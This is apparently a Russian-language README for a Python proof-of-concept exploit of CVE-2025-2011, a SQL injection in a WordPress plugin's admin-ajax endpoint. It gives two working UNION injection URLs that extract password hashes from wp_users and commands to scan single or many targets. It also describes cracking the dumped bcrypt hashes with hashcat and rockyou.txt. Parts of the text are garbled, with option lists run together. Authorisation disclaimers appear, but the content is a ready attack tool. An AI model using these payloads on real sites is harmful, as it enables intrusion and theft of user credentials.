
Эксплойт для CVE-2025-2011
Автор: X3RX3S, но гордо стырено Эшем Вескером, который прогнал мой код через GPT и вставил свой баннер ;) смотри тут ---> https://github.com/Ashwesker/Blackash-CVE-2025-2011 В «его» коде даже виден мой ник -_-'
Назначение: PoC-инструмент для проверки уязвимости SQL-инъекции (CVE-2025-2011) на сайтах WordPress.
Предупреждение: Используйте только на системах, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение. Несанкционированное тестирование незаконно и неэтично.

-p 1 или -p 2)$2a$, $2b$, $2y$), включая варианты с префиксом $wp$results_<hostname>.txt-m 3200) с запросом подтверждения-u) или нескольких целей из файла (-f)requestscoloramaУстановка зависимостей:
pip install requests colorama
Опционально (для взлома):
hashcat установлен и доступен в вашем PATH (по умолчанию используется /usr/share/wordlists/rockyou.txt)/usr/share/wordlists/rockyou.txtСделать скрипт исполняемым (опционально):
chmod +x CVE-2025-2011.py
Одиночная цель (пейлоад 1 по умолчанию):
python3 CVE-2025-2011.py -u https://example.com
Одиночная цель (пейлоад 2):
python3 CVE-2025-2011.py -u https://example.com -p 2
Несколько целей из файла (по одному URL в строке):
python3 CVE-2025-2011.py -f targets.txt
Для каждого протестированного хоста скрипт сохраняет файл с результатами:
results_<hostname>.txt
Если найдены bcrypt-хеши, они сохраняются в hashes.txt, и вам будет предложено взломать их с помощью Hashcat. Пример команды Hashcat, используемой скриптом:
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt
Примечание: bcrypt намеренно медленный. Взлом может занять очень много времени и потребовать GPU.
/wp-admin/admin-ajax.php?action=depicter-lead-index&s=test%27)+UNION+select+user_pass,2,3,4,5+FROM+wp_users--+x
/wp-admin/admin-ajax.php?action=depicter-lead-list&s=test%27))+table_name+UNION+select+user_pass+FROM+wp_users--+x
Этот инструмент предоставляется только в образовательных и защитных целях. Не используйте его против систем, на которые у вас нет явного разрешения. Автор и распространитель не несут ответственности за неправомерное использование. Всегда получайте письменное разрешение перед запуском тестов против целей, которыми вы не владеете.
run_hashcat в скрипте, указав нужный список.